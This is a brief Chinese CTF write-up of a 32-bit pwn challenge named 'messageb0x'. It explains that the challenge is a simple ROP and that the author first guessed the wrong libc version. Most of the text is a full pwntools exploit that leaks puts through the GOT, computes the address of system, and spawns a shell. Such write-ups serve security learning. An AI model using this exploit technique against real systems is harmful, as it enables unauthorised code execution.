这次安恒就看了pwn题,第二个是orange,还不会,就做了下第一个
总体就是个简单的rop,但是有个坑就是题目让我们猜libc的版本到底是啥
然后我在IDA里看到了一个字符串
被坑惨了,在2.27调试了半天后来发现是2.23的,哭了
#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
cn = process('./messageb0x')
bin = ELF('./messageb0x')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
def z(a=''):
gdb.attach(cn,a)
if a == '':
raw_input()
retn_addr=0x080490c0
cn.recvuntil('are:')
cn.sendline('')
#z('b *0x08049303')
#z('b *0x080492E2\n'+'b *0x08049315')
cn.recvuntil('address:')
cn.sendline('')
cn.recvuntil('to say:')
payload=(0x58+0x04)*'a'
payload+=p32(bin.plt['puts'])+p32(retn_addr)+p32(bin.got['puts'])
cn.sendline(payload)
#print(hex(puts_plt))
cn.recvuntil('--> Thank you !\n')
puts_addr=u32(cn.recv(4))
#puts_addr=u32(cn.recvuntil('\xf7')[-8:])
print(hex(puts_addr))
offset=libc.symbols['puts']-puts_addr
system_addr=libc.symbols['system']-offset
bin_addr=libc.search('/bin/sh').next()-offset
print(hex(system_addr))
print(hex(bin_addr))
cn.recvuntil('are:')
cn.sendline('')
cn.recvuntil('address:')
cn.sendline('')
cn.recvuntil('say:')
payload=(0x58+0x04)*'a'
payload+=p32(system_addr)+'aaaa'+p32(bin_addr)
cn.sendline(payload)
cn.interactive()